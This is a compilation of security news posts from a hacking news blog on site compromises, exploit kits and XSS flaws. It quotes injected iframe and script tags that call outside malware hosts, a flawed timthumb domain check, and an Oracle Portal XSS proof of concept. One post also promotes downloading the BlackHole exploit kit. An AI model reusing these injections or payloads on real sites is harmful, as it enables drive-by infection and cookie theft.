TeamSpeak Official Forum Hacked! Redirecting Users Into Malicious DotCache Exploit Kit

TeamSpeak Official Forum Hacked! Infecting Users By Malicious DotCache Exploit Kit

A serious security breach has compromised official forum of TeamSpeak, according to sources hackers have gained access inside the server and injected malicious script into the landing page of TeamSpeak official forum. Expert malware analyzer have figured out that the attack was thoroughly planned in order to infect millions of users while redirecting them to a DotCache exploit kit landing page as illustrated below 

TeamSpeak is a very famous Brazilian company who offers (VoIP) software that allows computer users to speak on a chat channel with fellow computer users, much like a telephone conference call. Users use the TeamSpeak client software to connect to a TeamSpeak server of their choice, from there they can join chat channels and enjoy the excellent VoIP service. Mostly it is used by millions of gamers across the globe. 

Basically we can consider TeamSpeak is a high value target, so did the hacker. Researchers said that the exploit kit landing page is hosted on atvisti.ro, a forum for ATV enthusiasts that's also been compromised. In a statement well known malware analyst & security researcher Jerome Segura said- if the Java exploit succeeds the final payload is loaded. In this particular example, the payload was the Zero Access Trojan which an Anti-Malware from Malwarebytes detects as Rootkit.0Access. The matter of a bit relief is that the malware has not yet been spotted in the wild. According to a statistic by Virus Total, only 7 of 46 leading antivirus can detect this type of malware. Exactly like TeamSpeak, a few days earlier Kahu Security researchers uncovered a similar compromise on the forum for the Nissan Pathfinder Off Road Association (NPORA) in both cases, JJEncode was used to obfuscate the malicious script. To avoid further infection, TeamSpeak forum has already been informed, an as expected they have over come this issue. For detail analysis of the above said malware you can visit official blog post of Malwarebytes. 

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">TeamSpeak Official Forum Hacked! Redirecting Users Into Malicious DotCache Exploit Kit"https://www.voiceofgreyhat.com/2013/12/TeamSpeak-forum-hacked.html</a>

Egyptian Hackers Selling Zero-day Exploit of Yahoo Mail For $700

Egyptian Hackers Selling Zero-day Exploit of Yahoo Mail For $700

Those people who wander in many underground hackers community, knows very well that several unethical equipment such as Botnet, Zero-day exploit, black hole exploit kit, malware, undisclosed vulnerabilities and so on were sold there for different prices. Those products were generally priced between $5-$500, but today I will talk about an expensive product, which listed itself top on the black market. I am talking about a new cross-site scripting exploit that enables attackers to steal cookies and access Yahoo email accounts. According to the blog post of Krebs on Security -A zero-day vulnerability in yahoo.com that lets attackers hijack Yahoo! email accounts and redirect users to malicious Web sites offers a fascinating glimpse into the underground market for large-scale exploits. The exploit, being sold for $700 by an Egyptian hacker on an exclusive cybercrime forum, targets a “cross-site scripting” (XSS) weakness in yahoo.com that lets attackers steal cookies from Yahoo! Webmail users. Such a flaw would let attackers send or read email from the victim’s account. In a typical XSS attack, an attacker sends a malicious link to an unsuspecting user; if the user clicks the link, the script is executed, and can access cookies, session tokens or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page. The hacker posted the following video to demonstrate the exploit for potential buyers. 

“I’m selling Yahoo stored xss that steal Yahoo emails cookies and works on ALL browsers,” wrote the vendor of this exploit, using the hacker handle ‘TheHell.’ “And you don’t need to bypass IE or Chrome xss filter as it do that itself because it’s stored xss. Prices around for such exploit is $1,100 – $1,500, while I offer it here for $700. Will sell only to trusted people cuz I don’t want it to be patched soon!” -said the hacker.  

In response Ramses Martinez, director of security at Yahoo!, said the challenge now is working out the exact yahoo.com URL that triggers the exploit, which is difficult to discern from watching the video. “Fixing it is easy, most XSS are corrected by simple code change,” Martinez said. “Once we figure out the offending URL we can have new code deployed in a few hours at most.”

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Egyptian Hackers Selling Zero-day Exploit of Yahoo Mail For $700"https://www.voiceofgreyhat.com/2012/11/Egyptian-Hacker-Selling-Zero-day-Exploit-of-Yahoo-Mail.html</a>

Two Young Researchers Found Vulnerability in Microsoft Windows Live Which Could Lead ID-Theft

Two Young Researchers Found Security Flaws in Microsoft Windows Live Which Could Lead Identity Theft

Recently two young security researchers of Morocco named Abdeljalil S'hit and Yasser Aboukir discovered a serious vulnerability in Microsoft's Windows Live service. The vulnerability has been reported to Microsoft, but unfortunately the software giant neither gave compastion nor  did any comment about the said topic. In a report ZDNet said the vulnerability in question leveraged Cross-Site Scripting (XSS) to execute a malicious script. 

More specifically, the two researchers managed to cause an error on the Windows Live login page (as you can see above), and once the victim clicked on the "Continue" button, their malicious script would be executed. XSS flaw means that an attacker could impersonate a Windows Live user by gaining full control of the victim's cookies. Combined with social engineering, this technique could be used to steal a victim's Windows Live identity with ease. 

The last update we got from Microsoft is saying - "We quickly addressed the vulnerability in question to help keep customers protected and appreciate the researchers using Coordinated Vulnerability Disclosure to assist in us working toward a fix in a coordinated manner"

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Two Young Researchers Found Vulnerability in Microsoft Windows Live Which Could Lead ID-Theft"https://www.voiceofgreyhat.com/2012/07/two-young-researchers-found.html</a>

Hacked Sites Infecting Android Mobiles With "drive-by" Malware

Hacked Sites Infecting Android Mobiles With "drive-by" Malware

Analysts with Lookout Mobile Security have found websites that have been hacked to deliver malicious software to devices running Android, an apparent new attack vector crafted for the mobile operating system. The style of attack is known as a drive-by download and is common on the desktop: When someone visits a hacked website, malware can transparently infect the computer if it doesn't have up-to-date patches. The malware, dubbed NotCompatible by Lookout Security and initially reported by Reddit user Georgiabiker, is hosted in a iframe at the bottom of a manipulated web page. When a user arrives on the page, a file by the name of "Update.apk" begins downloading immediately. According to Lookout Mobile Security official blog post- 

How it Works :- 

In this specific attack, if a user visits a compromised website from an Android device, their web browser will automatically begin downloading an application—this process is commonly referred to as a drive by download.

When the suspicious application finishes downloading, the device will display a notification prompting the user to click on the notification to install the downloaded app.  In order to actually install the app to a device, it must have the “Unknown sources” setting enabled (this feature is commonly referred to as “sideloading”).  If the device does not have the unknown sources setting enabled, the installation will be blocked.

Technical Details :- 

Infected websites commonly have the following code inserted into the bottom of each page:
<iframe
style=”visibility: hidden; display: none; display: none;”
src=”hxxp://gaoanalitics.info/?id={1234567890-0000-DEAD-BEEF-133713371337}”></iframe>

We’re still in the process of assessing the full extent of infected sites; however, there are early indications that the number of affected sites could be numerous.

When a PC-based web browser accesses the site at gaoanalitics.info, a not found error is returned; however, if a web browser with the word “Android” in its user-agent header accesses the page, the following is returned:

<html><head></head><body><script  type=”text/javascript”>window.top.location.href = “hxxp://androidonlinefix.info/fix1.php”;</script></body></html>

This page causes the browser to immediately attempt to access the page at androidonlinefix.info.  Like the previous site, only browsers sending an Android User-agent string will trigger a download (all other browsers will show a blank page).  When visiting this page from an Android browser, the server returns an android application, causing an Android browser to automatically download it. For detailed information click here. 

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Hacked Sites Infecting Android Mobiles With "drive-by" Malware"https://www.voiceofgreyhat.com/2012/05/hacked-sites-infecting-android-mobiles.html</a>

Fake Antivirus Exploit: More Than 200,000 Websites Have Been Infected

Fake Antivirus Exploit: More Than 200,000 Websites Have Been Infected 

More than 200,000 websites with fake anti-virus software, almost 30,000 unique sites has already been compromised with this fake anti-virus exploit. According to computer security group Websense, the exploit, which mostly affects sites built with WordPress, places a short piece of injected code at the bottom of a page:-

</DIV><!--END body=wrapper ==>
<script src="http://ionis901andsi.rr.nu/mm.php?d=1"></script>
</BODY></HTML>

When a user loads the page, they're redirected to a page in the .rr.nu top-level domain that mimics a Windows security scan, then asks them to download a malicious program to supposedly clear viruses from their computer. It's a scam that's been running in various forms for years, and Websense says it's been tracking this particular threat for several months.
Although the source of the malware is unknown, over 85% of the affected sites are from the United States, and Sucuri Security has traced many of the cases to old WordPress installs, weak passwords, or vulnerable and malicious plugins. According to several reports the exploit isn't as widespread as something like DNSChanger. However, for anyone who runs WordPress software, it's something to watch out for.

Earlier in 2011 we have also seen such scenario when 614,000 webpages comromised with mass ASP.NET Infection, also Willysy malware Infects More than 6 Million WeSites, Lilupophilupop Attack took 1 Million+ Web-pages and so on.

-Source (The Verge)

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Fake Antivirus Exploit: More Than 200,000 Websites Have Been Infected"https://www.voiceofgreyhat.com/2012/03/fake-antivirus-exploit-more-than-200000.html</a>

Serious Vulnerabilities Found By Deepanker Verma on Online Shopping Website

Serious Vulnerabilities Found By Deepanker Verma on shopping.indiatimes.com
 

Vulnerable Website:-
http://shopping.indiatimes.com/

According To the Hacker:-


"IndiaTimes shopping website has some serious XSS vulnerabilities which can lead to cookie stealing of users. And this may cause some serious loss to users. After going through some pages of the website, we (Shadab and me ) have found that the website is vulnerable to XSS injections and malicious scripts can be injected on the website."

Here are some screen shots submitted by the hacker to prove the vulnerability:-

 XSS on the login Page 

java-script Injection Vulnerability

 

Vulnerability on the product page 

Cookie Stealing Vulnerability

iframe vulnerability

above screen shots are clearly saying that this website is truly vulnerable and has lots of loop holes, one black hat can also inject malicious  codes and do marvellous harm

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Serious Vulnerabilities Found By Deepanker Verma on Online Shopping Website"https://www.voiceofgreyhat.com/2011/08/serious-vulnerabilities-found-by.html</a>

Image-Based Zero-day Vulnerability in WordPress

Bilocating technology blogger Mark Maunder - he claims to live in Seattle and Cape Town concurrently, though I suspect he means consecutively, and I'll wager he wisely avoids winter in both of them - recently wrote about an intrusion to his WordPress site.

It turns out the backdoor was a previously-unexploited, or at least a previously-undocumented, flaw in a useful little WordPress addon, shared by many WordPress themes, called timthumb.

Timthumb is an 864-line PHP script which assists with automatic image resizing, thumbmailing and so forth. (It doesn't squeeze the image manipulation code into those 864 lines, but uses the third-party GD library.)

If you run WordPress and you have a file named timthumb.php, sometimes renamed to thumb.php, in your installation, you may be at risk.

Tracking down the mechanism behind his intrusion, Maunder identified three main problems with timthumb.php: poor default settings; poor verification of input data; and poor choice of file permissions for temporary files.

By default, the vulnerable version of timthumb allowed images from external sites to be accessed from your server. The default list is probably unsurprising: 

// external domains that are allowed to be displayed on your website

$allowedSites = array (

'flickr.com',

'picasa.com',

'img.youtube.com',

'upload.wikimedia.org',

);

But a better default would be an empty list, so that users who want to allow external files to be sourced by their own servers need to take steps to enable that capability.

If you use WordPress and timthumb and you don't need this capability, Maunder suggests simply editing the timthumb.php code to say $allowedSites = array(); in order to prevent remote file trickery.

Secondly, timthumb.php checked the sanity of remote URLs - to verify they really were in the list of allowed sites - by looking for the permitted domains somewherewere the hostname part:

in the hostname part of the URL, rather than making sure they

$isAllowedSite = false;

foreach ($allowedSites as $site) {

if (strpos (strtolower ($url_info['host']), $site) !== false) {

$isAllowedSite = true;

}

}

This code meant that a dodgy website name such as picasa.com.badsite.example would pass the test, simply because it contains the string picasa.com. Clearly, that is not what was intended.

Lastly, timthumb.php stored the files it generated in a cache directory which is inside the PHP directory tree. This is bad, because files generated from untrusted external content - files only ever intended to be displayed - needlessly became executable.

So if the cached file isn't an innocent image, but a remote access PHP Trojan (in Maunder's case, the attacker used a malicious remote console tool called Alucar), you're owned

If you are a web developer:

* Don't trust externally-sourced content by default. Force your users to think about what they really want.

* Check, test, check, test, check and test again your URL sanitisation code. Build a decent test suite and verify your code against it every time you release an update.

* Keep files which are only ever supposed to be used as data - especially remotely-sourced files - outside the directory tree where your server-side executable code lives.

If you run a WordPress installation:-

Check if any of the blogs you host use timthumb.php, and upgrade to the latest version. The dodgy strpos above has been replaced with a tighter match based on a regular expression, like this:

$isAllowedSite = false;

foreach ($allowedSites as $site) {

if (preg_match ('/(?:^|\.)' . $site . '$/i', $url_info['host'])) {

$isAllowedSite = true;

}

}

This doesn't fix all of the issues Maunder describes, but it's better than having a known hole in your site.

Many thanks to Mr Maunder for turning an attack on his site into a training tool to help the rest of us avoid a similar problem!

-News Source (NS)

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Image-Based Zero-day Vulnerability in WordPress"https://www.voiceofgreyhat.com/2011/08/image-based-zero-day-vulnerability-in.html</a>

PCA start a new project named "You are Stupid" & this time the victim is NIC India

Pakistan Cyber Army has launched a project called "You are Stupid". After Acer looks stupid another disclosure and this time its India's "National Informatics Center". Here they also followed the same process "Google Hacking". Their intention is to bring out the information was to proof one old saying “There is no patch for human stupidity”. PCA just want to proof with this disclosure that in today’s complex security and network architecture many common things can be overlooked.  The more push is on buying high value solution implementation rather than developing sense of realization of the most important factor which is human resource. Here are some photos that will clear the story 

 

PCA Said:-  "... We were very sad and disappointed to see that such criminal negligence is been done and carry on for 3 years. We don’t know either we are ones who got this information or plenty of hackers already use that information for malicious purposes. We only use “Google Hacking” to pull out the information.Many of script kiddies out there was joking even taking us so lightly that it wasn’t a hack or even a kid can do this stuff with the information. We only answer “Where the F*** was everybody else since this information was there for 3 years”. Grow up hacking is not the usage of 0day exploits or usage of “Metasploit” and so to speak “Havji” it’s in the mind and in the intensions and even in life. In our opinion hacking is nothing but “Thinking! out of the box”..."

PCA also exposed the full credential (admin's Id & Pass, Vul Link)

Due to security reason I can't publish those credentials on my site. 

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">PCA start a new project named "You are Stupid" & this time the victim is NIC India"https://www.voiceofgreyhat.com/2011/06/pca-start-new-project-named-you-are.html</a>

BlackHole Exploit Kit 1.0.2 is now Available

BlackHole exploit kit is yet another in an ongoing wave of attack toolkits flooding the underground market. The kit first appeared on the crimeware market in September of 2010 and ever since then has quickly been gaining market share over its vast number of competitors. In fact, many antivirus vendors now claim that this is one of the most prevalent exploit kits used in the wild. Even Malware Domain List is showing quite a few domains infected with the BlackHole exploit kit. TDS or Traffic Direction Script. While this is not an entirely new concept in attack toolkits the TDS included her is much more sophisticated and powerful than those in other kits. A TDS is basically an engine that allows redirection of traffic through a set of rules. For example, a user can set up a set of rules that redirect flow to different landing pages on their domain. These rules could be based on operating system, browser, country of origin, exploit, files, etc. One rule might redirect traffic to page A for all users that are running Windows OS from XP to Vista and running IE 8, while another rule can redirect Windows 7 users to page B. Those were just simple example rules.

More advanced rules could set expiration dates for certain payloads and replace them with new ones when the date is reached. The TDS included in BlackHole even goes the extra step and allows you to create traffic flows based on these rules and provides management interface for the flows. A savvy malicious user with a lot of experience could easily utilize this rule engine to increase their infection numbers.From a web application standpoint BlackHole is built just like other kits, consisting of a PHP and MySQL backend. Since the majority of web servers run on the LAMP stack this enabled for very easy applicationdeployment. The user interface for this kit is a cut about the rest, and it definitely looks nicer than almost any other attack kit.

Download BlackHole Exploit Kit 1.0.2 here

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">BlackHole Exploit Kit 1.0.2 is now Available"https://www.voiceofgreyhat.com/2011/05/blackhole-exploit-kit-102-is-now.html</a>

Now anyone can be a cyber criminal

Cyber crime is no longer the exclusive domain of nerds with advanced coding and hacking skills. Thanks to simple and affordable, DIY downloadable crimeware, even novices can jump into what has turned into a global industry.
This is a far cry from the days when hacks were motivated more by the thrill of the kill than monetary gain, with even Steve Jobs and Steve Wozniak (Apple’s co-founders) allegedly on their rolls. It’s in the last decade, with the widening reach of the internet, that cyber crime turned virulent, as viruses like Melissa and I Love You clogged inboxes and spawned a multi-billion-dollar anti-virus software industry. And now, with the DIY attack kits, cybercrime is evolving into an extremely profitable, distributed global entity.
These malware toolkits aren’t just professional, marketable, and easy to deploy, they’re even being sold on a subscription model with after sales support.
Mpack, Neosploit, ZeuS, Nukespoilt P4ck, Phoenix … there’s an array of choices for script kiddies (those with minimal coding skills). “These kits come with features like encryption and hardware-based licensing, which one would find in enterprise-grade software,” says cyber sleuth Prasanna V, principal consultant of information security with Packet Verify. They enable users to launch pre-written threats against computer systems, and also customise them.
The United States, Russia, China, the UK, Germany, Brazil and Eastern European countries like the Ukraine are considered the hotbeds for development of such kits, and the damage they’re causing is already evident. According to a report by Symantec Corp, there was a 93% increase in web-based attacks in 2010 compared to the previous year, driven primarily by the prevalence of attack toolkits.
The modus operandi:
Most of the toolkits share a few common behavioural patterns, say Dr Madhupani and Dr Srinivas, technology experts with Cyber Security Works. “These can include capabilities to penetrate into browser processes, take screenshots of the victim’s machine or control it remotely, hijack e-banking sessions, add pages to a website and monitor them or steal passwords that have been stored by popular programs/browsers.” Users are lured through phishing websites, spam emails, download websites, freeware, or malicious codes inserted in legitimate programs.
What’s more worrying is that malware attacks from toolkits are difficult to monitor and curb because of both technological and legal factors. The cyber laws in most countries are largely inadequate to deal with the scale and reach of the crime. For example, a tool kit can enable a cyber criminal in Nigeria to spoof an Indian bank to send phishing emails to trick users in India. The network of cyber crime is spread so wide that it demands a coordinated effort by law enforcement agencies from all over the world that, as of now, is nonexistent.
On the technical side, “toolkits enable hackers to continuously generate new mutated malware variants, each targeting a different victim, making traditional discovery and fingerprinting of these threats nearly impossible,” says Ajay Goel, managing director, Symantec for India and SAARC.
On your guard:
So what can you do to protect yourself? For starters, realise that security does not start and end with an antivirus kit or a firewall, quips Prasanna. “Do not perform any financial transactions from shared systems like cyber cafes. Avoid connecting to free Wi-Fi hotspots. Scan USB before using. Stay away from suspicious websites and emails, limit the amount of personal information you give out on social networking sites like Facebook or Orkut,” he warns. “Finally, set the ‘automatic update’ option ON in all applications.”
Cyber Security Works issues another guideline: “Treat information the way you would treat your money.”

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Now anyone can be a cyber criminal"https://www.voiceofgreyhat.com/2011/05/now-anyone-can-be-cyber-criminal.html</a>

Attackers target applications

Software applications rather than operating systems or web browsers were the favoured target of cyber attackers last year, although the total number of application vulnerabilities was significantly down compared to 2009, a new report from Microsoft has shown.

Microsoft’s latest Security Intelligence Report found that overall, the industry’s disclosure of vulnerabilities – holes in software that bad guys can exploit – has been declining since 2006. Microsoft attributed this to better development practices and quality control on the part of developers, which it said results in more secure software.
Attacks exploiting weaknesses in Java rose sharply during the third quarter of 2010, beating every other kind of exploitation tracked by Microsoft’s Malware Protection Centre. Exploits using HTML and JavaScript increased steadily throughout the year and continue to represent a large portion of exploits, the report said.
In the third quarter, the number of Java attacks increased to fourteen times the number recorded in the previous quarter, following the discovery of two vulnerabilities in the Java Virtual Machine. These flaws alone accounted for 85pc of the Java exploits detected in the second half of 2010. By the end of the year Java exploits far outnumbered all other types of software vulnerabilities such as HTML/Script, operating systems, document readers and even Adobe Flash.

Drop-offs in flow of spam

The flow of spam also saw two massive drop-offs during last year, in September and December, which Microsoft said was due to the elimination of two sources – the Cutwail Spambot and Rustock. While Cutwail was taken out as part of an operation by security researchers, Rustock re-emerged in January and has begun sending spam again.
Now in its tenth year, Microsoft’s Security Intelligence Report provides in-depth perspectives on software vulnerabilities, exploits, malicious and potentially unwanted software and security breaches in both Microsoft and third party software.
The full report can be downloaded here.  

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Attackers target applications"https://www.voiceofgreyhat.com/2011/05/attackers-target-applications.html</a>

SWFRETools: A Tool to Reverse Engineer SWF Files

The SWFRE Tools are a collection of tools built for vulnerability analysis of the Adobe Flash player and for malware analysis of malicious SWF files. The tools are partly written in Java and partly in Python and are licensed under the GPL 2.0 license.
The basic architecture of SQFRETools is as follows:

• Flash Dissector: Flash Dissector is a GUI tool that allows you to inspect SWF files on a binary level. When you open a SWF file in Flash Dissector you have the ability to look through the structures defined in the SWF file in a hex editor and in a structure viewer. This makes it easy to understand what bytes of a SWF file hold what functionality.
• SWF Parser: SWF Parser is an open-source SWF file parser implemented in Java that you can build upon when you want to create your own Flash reverse engineering tools.
• Minimizer: The Minimizer program takes a SWF input that makes Flash Player crash and automatically removes the parts of the SWF file that are not related to the crash. This makes it easier to determine what the root cause of a crash is.
• FP Debugger: This Flash Player hooking script hooks important functionality in Flash Player at runtime and dumps information about what Flash Player is parsing and executing. This is very useful in situations where Flash Player trips up and static analysis are out of sync with what Flash Player is doing.
• StatsGenerator: Generate stats over SWF files.

Detailed information about using the above mentioned tools can be found in the “readme” files in the each of their directories. Application testing or code review businesses are in boom in the IT and Financial sectors. Tools such as SWFREtools help you as you try to analyze SWF file based exploits or even with stuff such as metadata from the extracted images.
This SWF file reverse engineering framework depends on the following lists of files and softwares:

• Java FileDrop
• JHexView
• Java
• splib
• Buggery

Download SWFREtools (swfretools_100.zip) here

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">SWFRETools: A Tool to Reverse Engineer SWF Files"https://www.voiceofgreyhat.com/2011/05/swfretools-tool-to-reverse-engineer-swf.html</a>

XSS in Oracle AS Portal 10g

I. VULNERABILITY
-------------------------
XSS in Oracle Portal Database Access Descriptor

II. BACKGROUND
-------------------------
Oracle AS Portal is a Web-based application for building and deploying
portals. It provides a secure, manageable environment for accessing
and interacting with enterprise software services and information
resources.

III. DESCRIPTION
-------------------------
Has been detected a reflected XSS vulnerability in Oracle Application
Server, that allows the execution of arbitrary HTML/script code to be
executed in the context of the victim user's browser.

The code injection is done through the DAD name. A DAD (Database
Access Descriptor) is a set of values that specifies how a database
server should fulfill a HTTP request.

IV. PROOF OF CONCEPT
-------------------------
Original request:
http://<oracle-application-server>/portal/pls/<DAD>

Malicious request:
http://<oracle-application-server>/portal/pls/<XSS injection>

Example 1:
http://<oracle-application-server>/portal/pls/"<H1>XSS vulnerability<XSS

In this scenario, the attacker has the difficulty of being unable to
close the HTML tag because he's can not add the character "/" as part
of the code injection (DAD name). However, it is possible to generate
that character without appearing in the injection. Below is an example.

Example 2:
http://<oracle-application-server>/portal/pls/"<img src=""
onmouseover="document.body.innerHTML=String.fromCharCode(60,72,84,77,76,62,60,72,49,62,88,83,83,60,47,72,49,62,32,60,72,50,62,86,85,76,78,60,47,72,50,62);"><XSS

V. BUSINESS IMPACT
-------------------------
An attacker can execute arbitrary HTML or script code in a targeted
user's browser, this can leverage to steal sensitive information as
user credentials, personal data, etc.

VI. SYSTEMS AFFECTED
-------------------------
Tested in Oracle Application Server Portal (Oracle AS Portal) 10g,
version 10.1.2. Other versions may be affected too.

VII. SOLUTION
-------------------------
Install last CPU (Critical Patch Update).

VIII. REFERENCES
-------------------------
http://www.oracle.com
http://www.isecauditors.com

IX. CREDITS
-------------------------
This vulnerability has been discovered
by Vicente Aguilera Diaz (vaguilera (at) isecauditors (dot) com).

X. REVISION HISTORY
-------------------------
August  11, 2010: Initial release
May     01, 2011: Final revision

XI. DISCLOSURE TIMELINE
-------------------------
August  11, 2010: Discovered by Internet Security Auditors
August  11, 2010: Oracle contacted including PoC.
August  12, 2010: Oracle inform that will investigate
                  the vulnerability.
April   19, 2011: Oracle fixed the vulnerability in the
                  CPU (Critical Patch Update).
May     01, 2011: Sent to lists.

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors accepts no responsibility for any damage
caused by the use or misuse of this information.

XIII. ABOUT
-------------------------
Internet Security Auditors is a Spain based leader in web application
testing, network security, penetration testing, security compliance
implementation and assessing. Our clients include some of the largest
companies in areas such as finance, telecommunications, insurance,
ITC, etc. We are vendor independent provider with a deep expertise
since 2001. Our efforts in R&D include vulnerability research, open
security project collaboration and whitepapers, presentations and
security events participation and promotion. For further information
regarding our security services, contact us.

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">XSS in Oracle AS Portal 10g"https://www.voiceofgreyhat.com/2011/05/xss-in-oracle-as-portal-10g.html</a>

Mass Injections Leading to g01pack Exploit Kit

Our ThreatSeeker® Network is constantly on the lookout to protect our customers from malicious attacks.  Recently it has detected a new injection attack which leads to an obscure Web attack kit.  The injection has three phases which will be covered in this blog post. Websense customers are protected from this attack by ACE, our Advanced Classification Engine.

The first phase of the attack is a typical vector for exploit kits to drive traffic to their sites: script injections.  Script HTML code is put on legitimate Web sites meant to drive traffic to the attack kits without the victim's knowledge.  In this case, legitimate sites are injected with malicious JavaScript.

 

In the second phase, this script injection then pulls obfuscated content from another site.  The obfuscated content creates an iframe that is used to pull content from the exploit kit site.  In the second phase, this script injection then pulls obfuscated content from another site.  The obfuscated content creates an iframe that is used to pull content from the exploit kit site. 

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Mass Injections Leading to g01pack Exploit Kit"https://www.voiceofgreyhat.com/2011/04/exploit.html</a>